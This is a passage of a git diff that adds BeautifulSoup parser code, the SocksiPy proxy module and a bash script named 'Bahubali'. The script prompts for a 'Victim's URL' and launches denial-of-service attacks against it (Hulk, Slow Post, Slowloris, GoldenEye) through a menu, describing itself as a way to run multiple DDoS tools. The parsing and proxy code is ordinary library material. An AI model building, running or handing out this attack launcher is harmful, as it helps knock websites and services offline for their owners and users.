re.compile("((^|;)\s*charset=)([^;]*)", re.M) + + def extractCharsetFromMeta(self, attrs): + """Beautiful Soup can detect a charset included in a META tag, + try to convert the document to that charset, and re-parse the + document from the beginning.""" + httpEquiv = None + contentType = None + contentTypeIndex = None + tagNeedsEncodingSubstitution = False + + for i in range(0, len(attrs)): + key, value = attrs[i] + key = key.lower() + if key == 'http-equiv': + httpEquiv = value + elif key == 'content': + contentType = value + contentTypeIndex = i + + if httpEquiv and contentType: # It's an interesting meta tag. + match = self.CHARSET_RE.search(contentType) + if match: + if (self.declaredHTMLEncoding is not None or + self.originalEncoding == self.fromEncoding): + # An HTML encoding was sniffed while converting + # the document to Unicode, or an HTML encoding was + # sniffed during a previous pass through the + # document, or an encoding was specified + # explicitly and it worked. Rewrite the meta tag. + def rewrite(match): + return match.group(1) + "%SOUP-ENCODING%" + newAttr = self.CHARSET_RE.sub(rewrite, contentType) + attrs[contentTypeIndex] = (attrs[contentTypeIndex][0], + newAttr) + tagNeedsEncodingSubstitution = True + else: + # This is our first pass through the document. + # Go through it again with the encoding information. + newCharset = match.group(3) + if newCharset and newCharset != self.originalEncoding: + self.declaredHTMLEncoding = newCharset + self._feed(self.declaredHTMLEncoding) + raise StopParsing + pass + tag = self.unknown_starttag("meta", attrs) + if tag and tagNeedsEncodingSubstitution: + tag.containsSubstitutions = True + + +class StopParsing(Exception): + pass + +class ICantBelieveItsBeautifulSoup(BeautifulSoup): + + """The BeautifulSoup class is oriented towards skipping over + common HTML errors like unclosed tags. However, sometimes it makes + errors of its own. For instance, consider this fragment: + + <b>Foo<b>Bar</b></b> + + This is perfectly valid (if bizarre) HTML. However, the + BeautifulSoup class will implicitly close the first b tag when it + encounters the second 'b'. It will think the author wrote + "<b>Foo<b>Bar", and didn't close the first 'b' tag, because + there's no real-world reason to bold something that's already + bold. When it encounters '</b></b>' it will close two more 'b' + tags, for a grand total of three tags closed instead of two. This + can throw off the rest of your document structure. The same is + true of a number of other tags, listed below. + + It's much more common for someone to forget to close a 'b' tag + than to actually use nested 'b' tags, and the BeautifulSoup class + handles the common case. This class handles the not-co-common + case: where you can't believe someone wrote what they did, but + it's valid HTML and BeautifulSoup screwed up by assuming it + wouldn't be.""" + + I_CANT_BELIEVE_THEYRE_NESTABLE_INLINE_TAGS = \ + ['em', 'big', 'i', 'small', 'tt', 'abbr', 'acronym', 'strong', + 'cite', 'code', 'dfn', 'kbd', 'samp', 'strong', 'var', 'b', + 'big'] + + I_CANT_BELIEVE_THEYRE_NESTABLE_BLOCK_TAGS = ['noscript'] + + NESTABLE_TAGS = buildTagMap([], BeautifulSoup.NESTABLE_TAGS, + I_CANT_BELIEVE_THEYRE_NESTABLE_BLOCK_TAGS, + I_CANT_BELIEVE_THEYRE_NESTABLE_INLINE_TAGS) + +class MinimalSoup(BeautifulSoup): + """The MinimalSoup class is for parsing HTML that contains + pathologically bad markup. It makes no assumptions about tag + nesting, but it does know which tags are self-closing, that + <script> tags contain Javascript and should not be parsed, that + META tags may contain encoding information, and so on. + + This also makes it better for subclassing than BeautifulStoneSoup + or BeautifulSoup.""" + + RESET_NESTING_TAGS = buildTagMap('noscript') + NESTABLE_TAGS = {} + +class BeautifulSOAP(BeautifulStoneSoup): + """This class will push a tag with only a single string child into + the tag's parent as an attribute. The attribute's name is the tag + name, and the value is the string child. An example should give + the flavor of the change: + + <foo><bar>baz</bar></foo> + => + <foo bar="baz"><bar>baz</bar></foo> + + You can then access fooTag['bar'] instead of fooTag.barTag.string. + + This is, of course, useful for scraping structures that tend to + use subelements instead of attributes, such as SOAP messages. Note + that it modifies its input, so don't print the modified version + out. + + I'm not sure how many people really want to use this class; let me + know if you do. Mainly I like the name.""" + + def popTag(self): + if len(self.tagStack) > 1: + tag = self.tagStack[-1] + parent = self.tagStack[-2] + parent._getAttrMap() + if (isinstance(tag, Tag) and len(tag.contents) == 1 and + isinstance(tag.contents[0], NavigableString) and + not parent.attrMap.has_key(tag.name)): + parent[tag.name] = tag.contents[0] + BeautifulStoneSoup.popTag(self) + +#Enterprise class names! It has come to our attention that some people +#think the names of the Beautiful Soup parser classes are too silly +#and "unprofessional" for use in enterprise screen-scraping. We feel +#your pain! For such-minded folk, the Beautiful Soup Consortium And +#All-Night Kosher Bakery recommends renaming this file to +#"RobustParser.py" (or, in cases of extreme enterprisiness, +#"RobustParserBeanInterface.class") and using the following +#enterprise-friendly class aliases: +class RobustXMLParser(BeautifulStoneSoup): + pass +class RobustHTMLParser(BeautifulSoup): + pass +class RobustWackAssHTMLParser(ICantBelieveItsBeautifulSoup): + pass +class RobustInsanelyWackAssHTMLParser(MinimalSoup): + pass +class SimplifyingSOAPParser(BeautifulSOAP): + pass + +###################################################### +# +# Bonus library: Unicode, Dammit +# +# This class forces XML data into a standard format (usually to UTF-8 +# or Unicode). It is heavily based on code from Mark Pilgrim's +# Universal Feed Parser. It does not rewrite the XML or HTML to +# reflect a new encoding: that happens in BeautifulStoneSoup.handle_pi +# (XML) and BeautifulSoup.start_meta (HTML). + +# Autodetects character encodings. +# Download from http://chardet.feedparser.org/ +try: + import chardet +# import chardet.constants +# chardet.constants._debug = 1 +except ImportError: + chardet = None + +# cjkcodecs and iconv_codec make Python know about more character encodings. +# Both are available from http://cjkpython.i18n.org/ +# They're built in if you use Python 2.4. +try: + import cjkcodecs.aliases +except ImportError: + pass +try: + import iconv_codec +except ImportError: + pass + +class UnicodeDammit: + """A class for detecting the encoding of a *ML document and + converting it to a Unicode string. If the source encoding is + windows-1252, can replace MS smart quotes with their HTML or XML + equivalents.""" + + # This dictionary maps commonly seen values for "charset" in HTML + # meta tags to the corresponding Python codec names. It only covers + # values that aren't in Python's aliases and can't be determined + # by the heuristics in find_codec. + CHARSET_ALIASES = { "macintosh" : "mac-roman", + "x-sjis" : "shift-jis" } + + def __init__(self, markup, overrideEncodings=[], + smartQuotesTo='xml', isHTML=False): + self.declaredHTMLEncoding = None + self.markup, documentEncoding, sniffedEncoding = \ + self._detectEncoding(markup, isHTML) + self.smartQuotesTo = smartQuotesTo + self.triedEncodings = [] + if markup == '' or isinstance(markup, unicode): + self.originalEncoding = None + self.unicode = unicode(markup) + return + + u = None + for proposedEncoding in overrideEncodings: + u = self._convertFrom(proposedEncoding) + if u: break + if not u: + for proposedEncoding in (documentEncoding, sniffedEncoding): + u = self._convertFrom(proposedEncoding) + if u: break + + # If no luck and we have auto-detection library, try that: + if not u and chardet and not isinstance(self.markup, unicode): + u = self._convertFrom(chardet.detect(self.markup)['encoding']) + + # As a last resort, try utf-8 and windows-1252: + if not u: + for proposed_encoding in ("utf-8", "windows-1252"): + u = self._convertFrom(proposed_encoding) + if u: break + + self.unicode = u + if not u: self.originalEncoding = None + + def _subMSChar(self, match): + """Changes a MS smart quote character to an XML or HTML + entity.""" + orig = match.group(1) + sub = self.MS_CHARS.get(orig) + if type(sub) == types.TupleType: + if self.smartQuotesTo == 'xml': + sub = '&#x'.encode() + sub[1].encode() + ';'.encode() + else: + sub = '&'.encode() + sub[0].encode() + ';'.encode() + else: + sub = sub.encode() + return sub + + def _convertFrom(self, proposed): + proposed = self.find_codec(proposed) + if not proposed or proposed in self.triedEncodings: + return None + self.triedEncodings.append(proposed) + markup = self.markup + + # Convert smart quotes to HTML if coming from an encoding + # that might have them. + if self.smartQuotesTo and proposed.lower() in("windows-1252", + "iso-8859-1", + "iso-8859-2"): + smart_quotes_re = "([\x80-\x9f])" + smart_quotes_compiled = re.compile(smart_quotes_re) + markup = smart_quotes_compiled.sub(self._subMSChar, markup) + + try: + # print "Trying to convert document to %s" % proposed + u = self._toUnicode(markup, proposed) + self.markup = u + self.originalEncoding = proposed + except Exception, e: + # print "That didn't work!" + # print e + return None + #print "Correct encoding: %s" % proposed + return self.markup + + def _toUnicode(self, data, encoding): + '''Given a string and its encoding, decodes the string into Unicode. + %encoding is a string recognized by encodings.aliases''' + + # strip Byte Order Mark (if present) + if (len(data) >= 4) and (data[:2] == '\xfe\xff') \ + and (data[2:4] != '\x00\x00'): + encoding = 'utf-16be' + data = data[2:] + elif (len(data) >= 4) and (data[:2] == '\xff\xfe') \ + and (data[2:4] != '\x00\x00'): + encoding = 'utf-16le' + data = data[2:] + elif data[:3] == '\xef\xbb\xbf': + encoding = 'utf-8' + data = data[3:] + elif data[:4] == '\x00\x00\xfe\xff': + encoding = 'utf-32be' + data = data[4:] + elif data[:4] == '\xff\xfe\x00\x00': + encoding = 'utf-32le' + data = data[4:] + newdata = unicode(data, encoding) + return newdata + + def _detectEncoding(self, xml_data, isHTML=False): + """Given a document, tries to detect its XML encoding.""" + xml_encoding = sniffed_xml_encoding = None + try: + if xml_data[:4] == '\x4c\x6f\xa7\x94': + # EBCDIC + xml_data = self._ebcdic_to_ascii(xml_data) + elif xml_data[:4] == '\x00\x3c\x00\x3f': + # UTF-16BE + sniffed_xml_encoding = 'utf-16be' + xml_data = unicode(xml_data, 'utf-16be').encode('utf-8') + elif (len(xml_data) >= 4) and (xml_data[:2] == '\xfe\xff') \ + and (xml_data[2:4] != '\x00\x00'): + # UTF-16BE with BOM + sniffed_xml_encoding = 'utf-16be' + xml_data = unicode(xml_data[2:], 'utf-16be').encode('utf-8') + elif xml_data[:4] == '\x3c\x00\x3f\x00': + # UTF-16LE + sniffed_xml_encoding = 'utf-16le' + xml_data = unicode(xml_data, 'utf-16le').encode('utf-8') + elif (len(xml_data) >= 4) and (xml_data[:2] == '\xff\xfe') and \ + (xml_data[2:4] != '\x00\x00'): + # UTF-16LE with BOM + sniffed_xml_encoding = 'utf-16le' + xml_data = unicode(xml_data[2:], 'utf-16le').encode('utf-8') + elif xml_data[:4] == '\x00\x00\x00\x3c': + # UTF-32BE + sniffed_xml_encoding = 'utf-32be' + xml_data = unicode(xml_data, 'utf-32be').encode('utf-8') + elif xml_data[:4] == '\x3c\x00\x00\x00': + # UTF-32LE + sniffed_xml_encoding = 'utf-32le' + xml_data = unicode(xml_data, 'utf-32le').encode('utf-8') + elif xml_data[:4] == '\x00\x00\xfe\xff': + # UTF-32BE with BOM + sniffed_xml_encoding = 'utf-32be' + xml_data = unicode(xml_data[4:], 'utf-32be').encode('utf-8') + elif xml_data[:4] == '\xff\xfe\x00\x00': + # UTF-32LE with BOM + sniffed_xml_encoding = 'utf-32le' + xml_data = unicode(xml_data[4:], 'utf-32le').encode('utf-8') + elif xml_data[:3] == '\xef\xbb\xbf': + # UTF-8 with BOM + sniffed_xml_encoding = 'utf-8' + xml_data = unicode(xml_data[3:], 'utf-8').encode('utf-8') + else: + sniffed_xml_encoding = 'ascii' + pass + except: + xml_encoding_match = None + xml_encoding_re = '^<\?.*encoding=[\'"](.*?)[\'"].*\?>'.encode() + xml_encoding_match = re.compile(xml_encoding_re).match(xml_data) + if not xml_encoding_match and isHTML: + meta_re = '<\s*meta[^>]+charset=([^>]*?)[;\'">]'.encode() + regexp = re.compile(meta_re, re.I) + xml_encoding_match = regexp.search(xml_data) + if xml_encoding_match is not None: + xml_encoding = xml_encoding_match.groups()[0].decode( + 'ascii').lower() + if isHTML: + self.declaredHTMLEncoding = xml_encoding + if sniffed_xml_encoding and \ + (xml_encoding in ('iso-10646-ucs-2', 'ucs-2', 'csunicode', + 'iso-10646-ucs-4', 'ucs-4', 'csucs4', + 'utf-16', 'utf-32', 'utf_16', 'utf_32', + 'utf16', 'u16')): + xml_encoding = sniffed_xml_encoding + return xml_data, xml_encoding, sniffed_xml_encoding + + + def find_codec(self, charset): + return self._codec(self.CHARSET_ALIASES.get(charset, charset)) \ + or (charset and self._codec(charset.replace("-", ""))) \ + or (charset and self._codec(charset.replace("-", "_"))) \ + or charset + + def _codec(self, charset): + if not charset: return charset + codec = None + try: + codecs.lookup(charset) + codec = charset + except (LookupError, ValueError): + pass + return codec + + EBCDIC_TO_ASCII_MAP = None + def _ebcdic_to_ascii(self, s): + c = self.__class__ + if not c.EBCDIC_TO_ASCII_MAP: + emap = (0,1,2,3,156,9,134,127,151,141,142,11,12,13,14,15, + 16,17,18,19,157,133,8,135,24,25,146,143,28,29,30,31, + 128,129,130,131,132,10,23,27,136,137,138,139,140,5,6,7, + 144,145,22,147,148,149,150,4,152,153,154,155,20,21,158,26, + 32,160,161,162,163,164,165,166,167,168,91,46,60,40,43,33, + 38,169,170,171,172,173,174,175,176,177,93,36,42,41,59,94, + 45,47,178,179,180,181,182,183,184,185,124,44,37,95,62,63, + 186,187,188,189,190,191,192,193,194,96,58,35,64,39,61,34, + 195,97,98,99,100,101,102,103,104,105,196,197,198,199,200, + 201,202,106,107,108,109,110,111,112,113,114,203,204,205, + 206,207,208,209,126,115,116,117,118,119,120,121,122,210, + 211,212,213,214,215,216,217,218,219,220,221,222,223,224, + 225,226,227,228,229,230,231,123,65,66,67,68,69,70,71,72, + 73,232,233,234,235,236,237,125,74,75,76,77,78,79,80,81, + 82,238,239,240,241,242,243,92,159,83,84,85,86,87,88,89, + 90,244,245,246,247,248,249,48,49,50,51,52,53,54,55,56,57, + 250,251,252,253,254,255) + import string + c.EBCDIC_TO_ASCII_MAP = string.maketrans( \ + ''.join(map(chr, range(256))), ''.join(map(chr, emap))) + return s.translate(c.EBCDIC_TO_ASCII_MAP) + + MS_CHARS = { '\x80' : ('euro', '20AC'), + '\x81' : ' ', + '\x82' : ('sbquo', '201A'), + '\x83' : ('fnof', '192'), + '\x84' : ('bdquo', '201E'), + '\x85' : ('hellip', '2026'), + '\x86' : ('dagger', '2020'), + '\x87' : ('Dagger', '2021'), + '\x88' : ('circ', '2C6'), + '\x89' : ('permil', '2030'), + '\x8A' : ('Scaron', '160'), + '\x8B' : ('lsaquo', '2039'), + '\x8C' : ('OElig', '152'), + '\x8D' : '?', + '\x8E' : ('#x17D', '17D'), + '\x8F' : '?', + '\x90' : '?', + '\x91' : ('lsquo', '2018'), + '\x92' : ('rsquo', '2019'), + '\x93' : ('ldquo', '201C'), + '\x94' : ('rdquo', '201D'), + '\x95' : ('bull', '2022'), + '\x96' : ('ndash', '2013'), + '\x97' : ('mdash', '2014'), + '\x98' : ('tilde', '2DC'), + '\x99' : ('trade', '2122'), + '\x9a' : ('scaron', '161'), + '\x9b' : ('rsaquo', '203A'), + '\x9c' : ('oelig', '153'), + '\x9d' : '?', + '\x9e' : ('#x17E', '17E'), + '\x9f' : ('Yuml', ''),} + +####################################################################### + + +#By default, act as an HTML pretty-printer. +if __name__ == '__main__': + import sys + soup = BeautifulSoup(sys.stdin) + print soup.prettify() diff --git a/src/BeautifulSoup.pyc b/src/BeautifulSoup.pyc Binary files differnew file mode 100644 index 0000000..9f0acae --- /dev/null +++ b/src/BeautifulSoup.pyc diff --git a/src/bahubali b/src/bahubali new file mode 100644 index 0000000..ed1b87d --- /dev/null +++ b/src/bahubali @@ -0,0 +1,99 @@ +#!/bin/bash +#set -x +cat << "ASCII" + + + ____ _ _ _ _ + | _ \ | | | | | (_) + | |_) | __ _| |__ _ _| |__ __ _| |_ + | _ < / _` | '_ \| | | | '_ \ / _` | | | + | |_) | (_| | | | | |_| | |_) | (_| | | | + |____/ \__,_|_| |_|\__,_|_.__/ \__,_|_|_| + + + + +ASCII +echo "Enter the Victim's URL with http:/https:" +read url + +while [[ ! $url =~ https?:// ]]; do + read -p "You have not used HTTP or HTTPS, Please Enter Again else the tools wont work. Enter Again : " url + +done +#echo "Reaches Here" +read F +clear +function menu() { +echo "Victim's URL is $url" +echo "Choose any option" +echo "(1) Hulk" +echo "(2) Slow Post DoS" +echo "(3) SlowORis" +echo "(4) GoldenEye" +echo "(5) About Bahubali" +echo "(6) Exit" +read -p "Enter the option number : " option +while [[ $option -le 0 || $option -ge 6 ]]; do + read -p "Invalid Input, Please Enter Again : " option +done +return $option +} +menu "$url" $option +echo "Your selected option is $option" +read -n1 -r -p "Press any key to continue..." key +if [ $option -eq 1 ]; then +clear +echo "Press Enter to Begin Hulk Atack" +read fun +clear +python hulk.py $url + +elif [ $option -eq 2 ]; then +clear +echo "Enter the no of threads eg 256" +read threadst +clear +echo "enter the web server port eg 80" +read portt +clear +echo "Press Enter to Begin Attack" +read funt +clear +python 2.py -t $url -r $threadst -p $portt -T +elif [ $option -eq 3 ]; then +clear +echo "May The Force Be With You" +echo "Press Enter to Attack" +read fun +perl 3.pl -dns $url -options +elif [ $option -eq 4 ]; then +echo "007 Attack starting" +echo "Under Heavy Testing would not work" +echo "GoldenEye Attack initiated" +read fun +python goldeneye.py $url +elif [ $option -eq 6 ]; then +echo "GoodBye" +exit +elif [ $option -eq 5 ]; then +clear +echo "ONE TOOL TO RULE THEM ALL" +cat << "A" + + + ____ _ _ _ _ + | _ \ | | | | | (_) + | |_) | __ _| |__ _ _| |__ __ _| |_ + | _ < / _` | '_ \| | | | '_ \ / _` | | | + | |_) | (_| | | | | |_| | |_) | (_| | | | + |____/ \__,_|_| |_|\__,_|_.__/ \__,_|_|_| + + + + +A +echo "Bahubali is a tool which allows you to execute any one of the multiple DDOS tools through one single tool" + +read about +fi diff --git a/src/socks.py b/src/socks.py new file mode 100644 index 0000000..7cc1bc3 --- /dev/null +++ b/src/socks.py @@ -0,0 +1,387 @@ +"""SocksiPy - Python SOCKS module.
+Version 1.00
+
+Copyright 2006 Dan-Haim. All rights reserved.
+
+Redistribution and use in source and binary forms, with or without modification,
+are permitted provided that the following conditions are met:
+1. Redistributions of source code must retain the above copyright notice, this
+ list of conditions and the following disclaimer.
+2. Redistributions in binary form must reproduce the above copyright notice,
+ this list of conditions and the following disclaimer in the documentation
+ and/or other materials provided with the distribution.
+3. Neither the name of Dan Haim nor the names of his contributors may be used
+ to endorse or promote products derived from this software without specific
+ prior written permission.
+
+THIS SOFTWARE IS PROVIDED BY DAN HAIM "AS IS" AND ANY EXPRESS OR IMPLIED
+WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
+MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO
+EVENT SHALL DAN HAIM OR HIS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
+INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
+LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA
+OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
+LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT
+OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMANGE.
+
+
+This module provides a standard socket-like interface for Python
+for tunneling connections through SOCKS proxies.
+
+"""
+
+import socket
+import struct
+
+PROXY_TYPE_SOCKS4 = 1
+PROXY_TYPE_SOCKS5 = 2
+PROXY_TYPE_HTTP = 3
+
+_defaultproxy = None
+_orgsocket = socket.socket
+
+class ProxyError(Exception):
+ def __init__(self, value):
+ self.value = value
+ def __str__(self):
+ return repr(self.value)
+
+class GeneralProxyError(ProxyError):
+ def __init__(self, value):
+ self.value = value
+ def __str__(self):
+ return repr(self.value)
+
+class Socks5AuthError(ProxyError):
+ def __init__(self, value):
+ self.value = value
+ def __str__(self):
+ return repr(self.value)
+
+class Socks5Error(ProxyError):
+ def __init__(self, value):
+ self.value = value
+ def __str__(self):
+ return repr(self.value)
+
+class Socks4Error(ProxyError):
+ def __init__(self, value):
+ self.value = value
+ def __str__(self):
+ return repr(self.value)
+
+class HTTPError(ProxyError):
+ def __init__(self, value):
+ self.value = value
+ def __str__(self):
+ return repr(self.value)
+
+_generalerrors = ("success",
+ "invalid data",
+ "not connected",
+ "not available",
+ "bad proxy type",
+ "bad input")
+
+_socks5errors = ("succeeded",
+ "general SOCKS server failure",
+ "connection not allowed by ruleset",
+ "Network unreachable",
+ "Host unreachable",
+ "Connection refused",
+ "TTL expired",
+ "Command not supported",
+ "Address type not supported",
+ "Unknown error")
+
+_socks5autherrors = ("succeeded",
+ "authentication is required",
+ "all offered authentication methods were rejected",
+ "unknown username or invalid password",
+ "unknown error")
+
+_socks4errors = ("request granted",
+ "request rejected or failed",
+ "request rejected because SOCKS server cannot connect to identd on the client",
+ "request rejected because the client program and identd report different user-ids",
+ "unknown error")
+
+def setdefaultproxy(proxytype=None,addr=None,port=None,rdns=True,username=None,password=None):
+ """setdefaultproxy(proxytype, addr[, port[, rdns[, username[, password]]]])
+ Sets a default proxy which all further socksocket objects will use,
+ unless explicitly changed.
+ """
+ global _defaultproxy
+ _defaultproxy = (proxytype,addr,port,rdns,username,password)
+
+class socksocket(socket.socket):
+ """socksocket([family[, type[, proto]]]) -> socket object
+
+ Open a SOCKS enabled socket. The parameters are the same as
+ those of the standard socket init. In order for SOCKS to work,
+ you must specify family=AF_INET, type=SOCK_STREAM and proto=0.
+ """
+
+ def __init__(self, family=socket.AF_INET, type=socket.SOCK_STREAM, proto=0, _sock=None):
+ _orgsocket.__init__(self,family,type,proto,_sock)
+ if _defaultproxy != None:
+ self.__proxy = _defaultproxy
+ else:
+ self.__proxy = (None, None, None, None, None, None)
+ self.__proxysockname = None
+ self.__proxypeername = None
+
+ def __recvall(self, bytes):
+ """__recvall(bytes) -> data
+ Receive EXACTLY the number of bytes requested from the socket.
+ Blocks until the required number of bytes have been received.
+ """
+ data = ""
+ while len(data) < bytes:
+ data = data + self.recv(bytes-len(data))
+ return data
+
+ def setproxy(self,proxytype=None,addr=None,port=None,rdns=True,username=None,password=None):
+ """setproxy(proxytype, addr[, port[, rdns[, username[, password]]]])
+ Sets the proxy to be used.
+ proxytype - The type of the proxy to be used. Three types
+ are supported: PROXY_TYPE_SOCKS4 (including socks4a),
+ PROXY_TYPE_SOCKS5 and PROXY_TYPE_HTTP
+ addr - The address of the server (IP or DNS).
+ port - The port of the server. Defaults to 1080 for SOCKS
+ servers and 8080 for HTTP proxy servers.
+ rdns - Should DNS queries be preformed on the remote side
+ (rather than the local side). The default is True.
+ Note: This has no effect with SOCKS4 servers.
+ username - Username to authenticate with to the server.
+ The default is no authentication.
+ password - Password to authenticate with to the server.
+ Only relevant when username is also provided.
+ """
+ self.__proxy = (proxytype,addr,port,rdns,username,password)
+
+ def __negotiatesocks5(self,destaddr,destport):
+ """__negotiatesocks5(self,destaddr,destport)
+ Negotiates a connection through a SOCKS5 server.
+ """
+ # First we'll send the authentication packages we support.
+ if (self.__proxy[4]!=None) and (self.__proxy[5]!=None):
+ # The username/password details were supplied to the
+ # setproxy method so we support the USERNAME/PASSWORD
+ # authentication (in addition to the standard none).
+ self.sendall("\x05\x02\x00\x02")
+ else:
+ # No username/password were entered, therefore we
+ # only support connections with no authentication.
+ self.sendall("\x05\x01\x00")
+ # We'll receive the server's response to determine which
+ # method was selected
+ chosenauth = self.__recvall(2)
+ if chosenauth[0] != "\x05":
+ self.close()
+ raise GeneralProxyError((1,_generalerrors[1]))
+ # Check the chosen authentication method
+ if chosenauth[1] == "\x00":
+ # No authentication is required
+ pass
+ elif chosenauth[1] == "\x02":
+ # Okay, we need to perform a basic username/password
+ # authentication.
+ self.sendall("\x01" + chr(len(self.__proxy[4])) + self.__proxy[4] + chr(len(self.proxy[5])) + self.__proxy[5])
+ authstat = self.__recvall(2)
+ if authstat[0] != "\x01":
+ # Bad response
+ self.close()
+ raise GeneralProxyError((1,_generalerrors[1]))
+ if authstat[1] != "\x00":
+ # Authentication failed
+ self.close()
+ raise Socks5AuthError,((3,_socks5autherrors[3]))
+ # Authentication succeeded
+ else:
+ # Reaching here is always bad
+ self.close()
+ if chosenauth[1] == "\xFF":
+ raise Socks5AuthError((2,_socks5autherrors[2]))
+ else:
+ raise GeneralProxyError((1,_generalerrors[1]))
+ # Now we can request the actual connection
+ req = "\x05\x01\x00"
+ # If the given destination address is an IP address, we'll
+ # use the IPv4 address request even if remote resolving was specified.
+ try:
+ ipaddr = socket.inet_aton(destaddr)
+ req = req + "\x01" + ipaddr
+ except socket.error:
+ # Well it's not an IP number, so it's probably a DNS name.
+ if self.__proxy[3]==True:
+ # Resolve remotely
+ ipaddr = None
+ req = req + "\x03" + chr(len(destaddr)) + destaddr
+ else:
+ # Resolve locally
+ ipaddr = socket.inet_aton(socket.gethostbyname(destaddr))
+ req = req + "\x01" + ipaddr
+ req = req + struct.pack(">H",destport)
+ self.sendall(req)
+ # Get the response
+ resp = self.__recvall(4)
+ if resp[0] != "\x05":
+ self.close()
+ raise GeneralProxyError((1,_generalerrors[1]))
+ elif resp[1] != "\x00":
+ # Connection failed
+ self.close()
+ if ord(resp[1])<=8:
+ raise Socks5Error(ord(resp[1]),_generalerrors[ord(resp[1])])
+ else:
+ raise Socks5Error(9,_generalerrors[9])
+ # Get the bound address/port
+ elif resp[3] == "\x01":
+ boundaddr = self.__recvall(4)
+ elif resp[3] == "\x03":
+ resp = resp + self.recv(1)
+ boundaddr = self.__recvall(resp[4])
+ else:
+ self.close()
+ raise GeneralProxyError((1,_generalerrors[1]))
+ boundport = struct.unpack(">H",self.__recvall(2))[0]
+ self.__proxysockname = (boundaddr,boundport)
+ if ipaddr != None:
+ self.__proxypeername = (socket.inet_ntoa(ipaddr),destport)
+ else:
+ self.__proxypeername = (destaddr,destport)
+
+ def getproxysockname(self):
+ """getsockname() -> address info
+ Returns the bound IP address and port number at the proxy.
+ """
+ return self.__proxysockname
+
+ def getproxypeername(self):
+ """getproxypeername() -> address info
+ Returns the IP and port number of the proxy.
+ """
+ return _orgsocket.getpeername(self)
+
+ def getpeername(self):
+ """getpeername() -> address info
+ Returns the IP address and port number of the destination
+ machine (note: getproxypeername returns the proxy)
+ """
+ return self.__proxypeername
+
+ def __negotiatesocks4(self,destaddr,destport):
+ """__negotiatesocks4(self,destaddr,destport)
+ Negotiates a connection through a SOCKS4 server.
+ """
+ # Check if the destination address provided is an IP address
+ rmtrslv = False
+ try:
+ ipaddr = socket.inet_aton(destaddr)
+ except socket.error:
+ # It's a DNS name. Check where it should be resolved.
+ if self.__proxy[3]==True:
+ ipaddr = "\x00\x00\x00\x01"
+ rmtrslv = True
+ else:
+ ipaddr = socket.inet_aton(socket.gethostbyname(destaddr))
+ # Construct the request packet
+ req = "\x04\x01" + struct.pack(">H",destport) + ipaddr
+ # The username parameter is considered userid for SOCKS4
+ if self.__proxy[4] != None:
+ req = req + self.__proxy[4]
+ req = req + "\x00"
+ # DNS name if remote resolving is required
+ # NOTE: This is actually an extension to the SOCKS4 protocol
+ # called SOCKS4A and may not be supported in all cases.
+ if rmtrslv==True:
+ req = req + destaddr + "\x00"
+ self.sendall(req)
+ # Get the response from the server
+ resp = self.__recvall(8)
+ if resp[0] != "\x00":
+ # Bad data
+ self.close()
+ raise GeneralProxyError((1,_generalerrors[1]))
+ if resp[1] != "\x5A":
+ # Server returned an error
+ self.close()
+ if ord(resp[1]) in (91,92,93):
+ self.close()
+ raise Socks4Error((ord(resp[1]),_socks4errors[ord(resp[1])-90]))
+ else:
+ raise Socks4Error((94,_socks4errors[4]))
+ # Get the bound address/port
+ self.__proxysockname = (socket.inet_ntoa(resp[4:]),struct.unpack(">H",resp[2:4])[0])
+ if rmtrslv != None:
+ self.__proxypeername = (socket.inet_ntoa(ipaddr),destport)
+ else:
+ self.__proxypeername = (destaddr,destport)
+
+ def __negotiatehttp(self,destaddr,destport):
+ """__negotiatehttp(self,destaddr,destport)
+ Negotiates a connection through an HTTP server.
+ """
+ # If we need to resolve locally, we do this now
+ if self.__proxy[3] == False:
+ addr = socket.gethostbyname(destaddr)
+ else:
+ addr = destaddr
+ self.sendall("CONNECT " + addr + ":" + str(destport) + " HTTP/1.1\r\n" + "Host: " + destaddr + "\r\n\r\n")
+ # We read the response until we get the string "\r\n\r\n"
+ resp = self.recv(1)
+ while resp.find("\r\n\r\n")==-1:
+ resp = resp + self.recv(1)
+ # We just need the first line to check if the connection
+ # was successful
+ statusline = resp.splitlines()[0].split(" ",2)
+ if statusline[0] not in ("HTTP/1.0","HTTP/1.1"):
+ self.close()
+ raise GeneralProxyError((1,_generalerrors[1]))
+ try:
+ statuscode = int(statusline[1])
+ except ValueError:
+ self.close()
+ raise GeneralProxyError((1,_generalerrors[1]))
+ if statuscode != 200:
+ self.close()
+ raise HTTPError((statuscode,statusline[2]))
+ self.__proxysockname = ("0.0.0.0",0)
+ self.__proxypeername = (addr,destport)
+
+ def connect(self,destpair):
+ """connect(self,despair)
+ Connects to the specified destination through a proxy.
+ destpar - A tuple of the IP/DNS address and the port number.
+ (identical to socket's connect).
+ To select the proxy server use setproxy().
+ """
+ # Do a minimal input check first
+ if (type(destpair) in (list,tuple)==False) or (len(destpair)<2) or (type(destpair[0])!=str) or (type(destpair[1])!=int):
+ raise GeneralProxyError((5,_generalerrors[5]))
+ if self.__proxy[0] == PROXY_TYPE_SOCKS5:
+ if self.__proxy[2] != None:
+ portnum = self.__proxy[2]
+ else:
+ portnum = 1080
+ _orgsocket.connect(self,(self.__proxy[1],portnum))
+ self.__negotiatesocks5(destpair[0],destpair[1])
+ elif self.__proxy[0] == PROXY_TYPE_SOCKS4:
+ if self.__proxy[2] != None:
+ portnum = self.__proxy[2]
+ else:
+ portnum = 1080
+ _orgsocket.connect(self,(self.__proxy[1],portnum))
+ self.__negotiatesocks4(destpair[0],destpair[1])
+ elif self.__proxy[0] == PROXY_TYPE_HTTP:
+ if self.__proxy[2] != None:
+ portnum = self.__proxy[2]
+ else:
+ portnum = 8080
+ _orgsocket.connect(self,(self.__proxy[1],portnum))
+ self.__negotiatehttp(destpair[0],destpair[1])
+ elif self.__proxy[0] == None:
+ _orgsocket.connect(self,(destpair[0],destpair[1]))
+ else:
+ raise GeneralProxyError((4,_generalerrors[4]))
